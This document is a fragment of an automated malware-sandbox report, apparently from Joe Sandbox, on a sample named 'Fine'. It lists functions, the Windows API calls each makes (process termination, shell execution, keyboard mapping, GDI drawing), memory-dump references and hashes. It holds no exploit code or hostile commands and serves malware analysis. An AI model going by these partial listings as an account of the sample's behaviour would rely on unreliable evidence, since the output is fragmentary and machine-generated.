                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7345572aae2d2bf199ce4a6409ff08ce98d2a5bcb607f862aed41ff09f2dcbdb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6e4850f20eaaad5622a362115d0e073bcd172a32fa9a4e1de8232ebb68a60ac7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7345572aae2d2bf199ce4a6409ff08ce98d2a5bcb607f862aed41ff09f2dcbdb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C01F7B261E3296EA72A37B5BDCA6773A94EB15775B20032AF330C11F1EF514D126540
                                                                                                                                                                                                                                                                                                                            Function 002030E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,001F4D53,00000000,?,?,001F68E2,?,?,00000000), ref: 002030EB
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020311E
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203146
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00203153
                                                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 0020315F
                                                                                                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00203165
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d72a525d1718d38fd8893611a22494e43173b0e4d1ffd1d0c962b213c01ee6c9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6fbae09626c6dbc136881126fea27560aefd1b1561c1d8f861d6bae426900206
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d72a525d1718d38fd8893611a22494e43173b0e4d1ffd1d0c962b213c01ee6c9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BF07D33A34701A7C311BB34BC0EA5E561D9FC9370B210015F91CD22E3EF608E324860
                                                                                                                                                                                                                                                                                                                            Function 00269480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D1F87
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: SelectObject.GDI32(?,00000000), ref: 001D1F96
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: BeginPath.GDI32(?), ref: 001D1FAD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: SelectObject.GDI32(?,00000000), ref: 001D1FD6
                                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002694AA
                                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 002694BE
                                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002694CC
                                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 002694DC
                                                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 002694EC
                                                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 002694FC
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c0d2bc2de45872b96734196f9d0760c79d99b9417b5ff4b1db96c57c3bd440c9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 88e994991f48fc618baa50e77475dec460cc732d0d1dbd0f9125f9eb03b6e216
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0d2bc2de45872b96734196f9d0760c79d99b9417b5ff4b1db96c57c3bd440c9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6611097250010DBFDB029F94EC88E9A7F6DEB08360F00C011FA195A161CBB1AD959BA0
                                                                                                                                                                                                                                                                                                                            Function 00235B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00235B7C
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00235B8D
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00235B94
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00235B9C
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00235BB3
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00235BC5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 63ad778ff599d6b05ec8b5304b0d87c031c9429fb0402aa891dfef0075c1f7f7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 780da1c75f2bbdf034fd77393482bcc402c36509bcdc9adc20a13e45fd6aec6d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63ad778ff599d6b05ec8b5304b0d87c031c9429fb0402aa891dfef0075c1f7f7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C0144B5E00719BBEB109FA5AC49E4EBF79EF48751F108065FA09A7284D6B09C11CFA1
                                                                                                                                                                                                                                                                                                                            Function 001D327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001D32AF
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 001D32B7
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001D32C2
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001D32CD
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 001D32D5
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001D32DD
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8a64304767be59113958c2f9c01e330bb77341e5bc03e9b3436af64fc332bffb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0bca935a2160e9dfb1ab07b3005237200df3fed3df7342251089166132ea77f2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a64304767be59113958c2f9c01e330bb77341e5bc03e9b3436af64fc332bffb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BD15C4B941C7F5A864CBE5
                                                                                                                                                                                                                                                                                                                            Function 0023F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0023F447
                                                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0023F45D
                                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0023F46C
                                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0023F47B
                                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0023F485
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0023F48C
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 34547b9ab367f4c3d5fd492181ba84554129d26937ac5a3633dfe22576d5e983
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 90f1870c12602e4ce97057ba07e85087a5d9bdc719f660b747b9feb081254cb7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34547b9ab367f4c3d5fd492181ba84554129d26937ac5a3633dfe22576d5e983
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6F06D32B01158BBE7215B62AC0EEEB3A7CEBCAB11F004058F60591090D6E01A01C6B5
                                                                                                                                                                                                                                                                                                                            Function 002134D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?), ref: 002134EF
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00213506
                                                                                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 00213512
                                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00213521
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00213533
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 0021354D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d2d1eb3a5d8ae18674ca9d56c52444439037524e212ec11152de42beb3a1c744
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 862ae1216325fb30d1c036fd92b33ddf5d94cd5e941d9a7b01c293d284b37d0d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2d1eb3a5d8ae18674ca9d56c52444439037524e212ec11152de42beb3a1c744
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1014F31A00119FFDB515F64EC08BE97BB6FB18721F514160F91AA21A0CB711E919B51
                                                                                                                                                                                                                                                                                                                            Function 002321C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002321CC
                                                                                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 002321D8
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 002321E1
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 002321E9
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 002321F2
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002321F9
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bd1d6f880cf2e470a87e83be88281278d33da164794f98d987bd0d960093bdd9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c4a779099d5e82721afbc9386ea2284ba988fcb6a0242647cfeed3e13f8fb3b5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd1d6f880cf2e470a87e83be88281278d33da164794f98d987bd0d960093bdd9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FE0E57A604149BBDB011FA2FC0C90ABF39FF4A322B208260F22982170CBB29430DF51
                                                                                                                                                                                                                                                                                                                            Function 0025B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0025B903
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D41EA: _wcslen.LIBCMT ref: 001D41EF
                                                                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 0025B998
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025B9C7
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                                                                                            • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ce3ffdcbde29aeb504ed0ffdbc3ef5dd219d43a77de248bf05db80e72c1b804d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a673707529e1bb7cdb84bdaa0ae07072807b51995ac79cdb6a789f3ad1a0822f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce3ffdcbde29aeb504ed0ffdbc3ef5dd219d43a77de248bf05db80e72c1b804d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60716774A10219DFCB11EF54C495A9EBBF4BF08310F04849AE856AB352CB74ED55CF94
                                                                                                                                                                                                                                                                                                                            Function 00237B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00237B6D
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00237BA3
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00237BB4
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00237C36
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                                                            • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                                                            • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2120430b28935391b539070ed73c8c21b6d36b110131fde2f4476593d5c47fc7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b98a25cbdbb74c112b124ac341b8716074d2beb6e41185f84fda08f3f5a2c043
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2120430b28935391b539070ed73c8c21b6d36b110131fde2f4476593d5c47fc7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B41C3F1624205DFDF25CF24D884A9A7BB9EF44314F1494AAE8099F206DBB0DD54CBA0
                                                                                                                                                                                                                                                                                                                            Function 00264818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002648D1
                                                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 002648E6
                                                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0026492E
                                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00264941
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6daf129172e5b3fadabb5fffd5d3f3606b7acdeae33c4511583ff240d82a0c5c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5ef5dc56b936c8c68e25c356976bf242aad5a448422a632182498c236e42d0b1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6daf129172e5b3fadabb5fffd5d3f3606b7acdeae33c4511583ff240d82a0c5c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F415B75A1120AEFDB10DF55E884EAABBB9FF06324F448129E98597350C770EDA4CF60
                                                                                                                                                                                                                                                                                                                            Function 0023272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
